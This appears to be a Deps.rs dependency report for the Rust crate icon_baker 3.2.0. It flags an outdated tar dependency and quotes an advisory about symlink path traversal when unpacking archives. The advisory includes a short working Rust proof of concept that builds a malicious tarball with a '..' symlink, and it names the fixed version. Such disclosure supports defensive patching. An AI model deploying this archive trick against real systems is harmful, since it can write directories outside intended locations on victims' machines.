icon_baker 3.2.0

Crate	Required	Latest	Status
icns	`^0.3.0`	`0.3.1`	up to date
ico	`^0.1.0`	`0.3.0`	out of date
image	`^0.22.1`	`0.25.1`	out of date
resvg	`^0.8.0`	`0.41.0`	out of date
tar ⚠️	`^0.4.26`	`0.4.40`	maybe insecure

When unpacking a tarball that contains a symlink the tar crate may create directories outside of the directory it's supposed to unpack into.

The function errors when it's trying to create a file, but the folders are already created at this point.

use std::{io, io::Result};
use tar::{Archive, Builder, EntryType, Header};

fn main() -> Result<()> {
    let mut buf = Vec::new();

    {
        let mut builder = Builder::new(&mut buf);

        // symlink: parent -> ..
        let mut header = Header::new_gnu();
        header.set_path("symlink")?;
        header.set_link_name("..")?;
        header.set_entry_type(EntryType::Symlink);
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        // file: symlink/exploit/foo/bar
        let mut header = Header::new_gnu();
        header.set_path("symlink/exploit/foo/bar")?;
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        builder.finish()?;
    };

    Archive::new(&*buf).unpack("demo")
}

This has been fixed in https://github.com/alexcrichton/tar-rs/pull/259 and is published as tar 0.4.36. Thanks to Martin Michaelis (@mgjm) for discovering and reporting this, and Nikhil Benesch (@benesch) for the fix!

Deps.rs

icon_baker 3.2.0

Crate `icon_baker`

Dependencies

Security Vulnerabilities

`tar`: Links in archive can create arbitrary directories

icon_baker 3.2.0

Crate icon_baker

Dependencies

Security Vulnerabilities

tar: Links in archive can create arbitrary directories

Crate `icon_baker`

`tar`: Links in archive can create arbitrary directories